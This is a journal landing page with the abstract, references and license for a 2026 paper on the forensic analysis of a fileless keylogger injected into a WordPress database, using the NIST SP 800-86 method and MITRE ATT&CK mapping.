Digital Forensic Analysis of Keylogger Attack Evidence on Websites Using the NIST Method

Authors

  • Arizona Firdonsyah Universitas Aisyiyah Yogyakarta
  • Dimas Rizki Setyaji Universitas Aisyiyah Yogyakarta

DOI:

https://doi.org/10.33394/j-ps.v14i2.19919

Keywords:

Digital forensics, Keylogger, WordPress, NIST, MITRE ATT&CK

Abstract

WordPress commands 43.2% of global websites and has become a primary target for keylogger attacks, with vulnerability trends showing exponential growth from 1,543 in 2014 to 8,907 in 2025 according to WPScan Vulnerability Database. This research employs the National Institute of Standards and Technology (NIST) SP 800-86 method integrated with MITRE ATT&CK framework to analyze WordPress websites suspected of keylogger infection. A comparative approach is implemented by comparing WordPress against the DIABEX website (an AI-based diabetes diagnosis system) as baseline control. The research utilizes qualitative descriptive methodology through four NIST phases: Collection, Examination, Analysis, and Reporting, with historical activity log extraction from a 30-day period using Python-based forensic tools. Results identified a database-injected fileless keylogger on WordPress through wp_options table manipulation, with MITRE ATT&CK mapping across Initial Access (TA0001), Persistence (TA0003), Collection (T1056.001), and Exfiltration (TA0010) stages. Comparative security assessment revealed a 53-point gap between WordPress (29/100 - CRITICAL) and DIABEX (82/100 - GOOD), demonstrating that 97% of WordPress vulnerabilities originate from third-party plugins, requiring comprehensive database integrity monitoring and security audits.

References

Bhalerao, P., Vadhwani, P., Wagaskar, A., & Pansare, S. (2025). Keylogger: An advanced method for computer monitoring. International Journal for Multidisciplinary Research, 7(3). www.ijfmr.com

Case, A., Di Maggio, R., Firoz-Ul-Amin, M., Jalalzai, M. M., Ali-Gombe, A., Sun, M., & Richard, G. G. (2020). HookTracer: Automatic detection and analysis of keystroke loggers using memory forensics. Computers & Security, 96, 101872. https://doi.org/10.1016/j.cose.2020.101872

Chinchalkar, S. P., & Somkunwar, R. K. (2024). An innovative keylogger detection system using machine learning algorithms and dendritic cell algorithm. Revue d'Intelligence Artificielle, 38(1), 269–275. https://doi.org/10.18280/ria.380128

Firdonsyah, A. (2021). Comparative analysis of forensic softwares for Android-based Blackberry Messenger using NIJ framework and NIST measurements. International Journal of Cyber-Security and Digital Forensics, 10(4), 218–226.

Firdonsyah, A., & Wijayanto, D. (2022). Analisis forensik rekayasa dokumen PDF dengan metode NIST. Informatics Journal, 7(2), 63–70. https://doi.org/10.33751/infomatek.v7i2

Gaber, M. G., Ahmed, M., & Janicke, H. (2024). Malware detection with artificial intelligence: A systematic literature review. ACM Computing Surveys, 56(6), 1–39. https://doi.org/10.1145/3638552

Hanaputra, R. R., Riadi, I., & Luthfi, A. (2024). Identifikasi digital evidence dalam transaction fraud pada aplikasi Telegram menggunakan framework NIST SP 800-86. IT Journal Research and Development, 9(1), 126–141. https://doi.org/10.25299/itjrd.2024.vol9(1).13630

Hargreaves, C., van Beek, H., & Casey, E. (2025). SOLVE-IT: A proposed digital forensic knowledge base inspired by MITRE ATT&CK. Forensic Science International: Digital Investigation, 52, 301864. https://doi.org/10.1016/j.fsidi.2025.301864

Harish, R., & Swapna, M. P. (2025). Cross-platform analysis of script-based fileless malware using memory forensics. In S. Kumar, S. Hiranwal, R. Garg, & S. Purohit (Eds.), Proceedings of International Conference on Communication and Computational Technologies (ICCCT 2024) (Lecture Notes in Networks and Systems, Vol. 1122). Springer. https://doi.org/10.1007/978-981-97-7426-5_23

ISACA. (2024, October 17). Comparing the MITRE ATT&CK and NIST cybersecurity frameworks. https://www.isaca.org/resources/news-and-trends/industry-news/2024

Kent, K., Chevalier, S., Grance, T., & Dang, H. (2006). Guide to integrating forensic techniques into incident response (NIST Special Publication 800-86). National Institute of Standards and Technology. https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-86.pdf

Mohamed Mohideen, M. A., Nadeem, M. S., Hardy, J., Ali, H., Tariq, U. U., Sabrina, F., Waqar, M., & Ahmed, S. (2024). Behind the code: Identifying zero-day exploits in WordPress. Future Internet, 16(7), 256. https://doi.org/10.3390/fi16070256

Muthia, R., Touloumis, T., & Nazzal, M. (2025). MITRE ATT&CK applications in cybersecurity and the way forward. arXiv. https://arxiv.org/abs/2502.10825

National Institute of Standards and Technology. (2022). Cybersecurity framework version 1.1. https://www.nist.gov/cyberframework

National Institute of Standards and Technology. (2024). The NIST cybersecurity framework (CSF) 2.0 (NIST CSWP 29). https://doi.org/10.6028/NIST.CSWP.29

Pandey, B., Pandey, P., Kulmuratova, A., & Rzayeva, L. (2024). Efficient usage of web forensics, disk forensics and email forensics in successful investigation of cyber crime. International Journal of Information Technology, 16, 3815–3824. https://doi.org/10.1007/s41870-024-02014-6

Patchstack. (2024, March 21). State of WordPress security in 2024. https://patchstack.com/whitepaper/state-of-wordpress-security-in-2024/

Putra, B. S., & Santoso, D. B. (2025). Analisis keamanan website berbasis WordPress melalui penetration testing untuk meningkatkan keamanan digital. Jurnal JTIK (Jurnal Teknologi Informasi dan Komunikasi), 9(3), 981–990. https://doi.org/10.35870/jtik.v9i3.3692

Rachmie, S. (2020). Peranan ilmu digital forensik terhadap penyidikan kasus peretasan website. Litigasi, 21(1), 104–127. https://doi.org/10.23969/litigasi.v21i1.2388

Rafi, M., Ihsan, I., & Voutama, A. (2025). Penerapan metode NIST dalam analisis forensik digital pasca serangan siber: Studi kasus PT. Analis Digital Forensik. Jurnal Teknik Informatika dan Sistem Informasi, 8(1), 1–12.

Rahayu, S., Rianto, B., & Apriani, D. (2023). Vulnerability assessment with network-based scanner method for improving website security. Computer Network, Application, and Hardware Conference (CNAHPC), 5(1), 213–221. https://doi.org/10.47709/cnahpc.v5i1.1991

Ramadhani, G. T. A., Steyer, M. R. R., Maulidan, M. H., & Setiawan, A. (2024). Analisis kerentanan WordPress dengan WPScan dan teknik mitigasi. Journal of Internet and Software Engineering, 1(4), 1–15. https://doi.org/10.47134/pjise.v1i4.2613

Riadi, I., Umar, R., & Firdonsyah, A. (2018). Forensic tools performance analysis on Android-based Blackberry Messenger using NIST measurements. International Journal of Electrical and Computer Engineering, 8(5), 3991–4003. https://doi.org/10.11591/ijece.v8i5.pp3991-4003

Riskiyadi, M. (2020). Investigasi forensik terhadap bukti digital dalam mengungkap cybercrime. Jurnal Teknik Informatika UNIKA Santo Thomas, 3(2), 115–124.

Setiawan, A., & Kurniawan, B. (2024). Penerapan metodologi forensik digital NIST SP 800-86 dalam investigasi serangan ransomware LockBit 3.0. Jurnal Sains, Aplikasi, Komputasi dan Teknologi Informasi, 6(3), 371–382. https://doi.org/10.30872/jsakti.v6i3.11137

Singh, A., Choudhary, P., Singh, A. K., & Tyagi, D. K. (2021). Keylogger detection and prevention. Journal of Physics: Conference Series, 2007(1), 012005. https://doi.org/10.1088/1742-6596/2007/1/012005

Singh, N., & Tripathy, S. (2025). Unveiling the veiled: An early stage detection of fileless malware. Computers & Security, 150, 104231. https://doi.org/10.1016/j.cose.2024.104231

Strom, B. E., Applebaum, A., Miller, D. P., Nickels, K. C., Pennington, A. G., & Thomas, C. B. (2018). MITRE ATT&CK: Design and philosophy. MITRE. https://attack.mitre.org

Strom, B. E., Battaglia, J. A., Kemmerer, M. S., Kupersanin, W., Miller, D. P., Wampler, C., Whitley, S. M., & Wolf, R. D. (2024). Finding cyber threats with ATT&CK-based analytics (MITRE Technical Report MTR170202). MITRE. https://attack.mitre.org

Tabassi, E. (2023). Artificial intelligence risk management framework (AI RMF 1.0) (NIST AI 100-1). National Institute of Standards and Technology. https://doi.org/10.6028/NIST.AI.100-1

W3Techs. (2025, May 5). Usage statistics and market share of WordPress. https://w3techs.com/technologies/details/cm-wordpress

Zamościński, P., & Kozieł, G. (2020). Analysis of security CMS platforms by vulnerability scanners. Journal of Computer Sciences Institute, 16, 261–268. https://doi.org/10.35784/jcsi.2020

Downloads

Published

2026-04-28

How to Cite

Firdonsyah, A., & Setyaji, D. R. (2026). Digital Forensic Analysis of Keylogger Attack Evidence on Websites Using the NIST Method. Prisma Sains : Jurnal Pengkajian Ilmu Dan Pembelajaran Matematika Dan IPA IKIP Mataram, 14(2), 412–435. https://doi.org/10.33394/j-ps.v14i2.19919

Issue

Vol. 14 No. 2: April 2026

Section

Research Articles

License

Copyright (c) 2026 Arizona Firdonsyah, Dimas Rizki Setyaji

Creative Commons License

This work is licensed under a Creative Commons Attribution 4.0 International License.

Authors who publish with this journal agree to the following terms:

  1. Authors retain copyright and grant the journal right of first publication with the work simultaneously licensed under a Creative Commons Attribution License that allows others to share the work with an acknowledgement of the work's authorship and initial publication in this journal.
  2. Authors are able to enter into separate, additional contractual arrangements for the non-exclusive distribution of the journal's published version of the work (e.g., post it to an institutional repository or publish it in a book), with an acknowledgement of its initial publication in this journal.
  3. Authors are permitted and encouraged to post their work online (e.g., in institutional repositories or on their website) prior to and during the submission process, as it can lead to productive exchanges, as well as earlier and greater citation of published work (See The Effect of Open Access).

 Creative Commons License
This work is licensed under a Creative Commons Attribution 4.0 International License.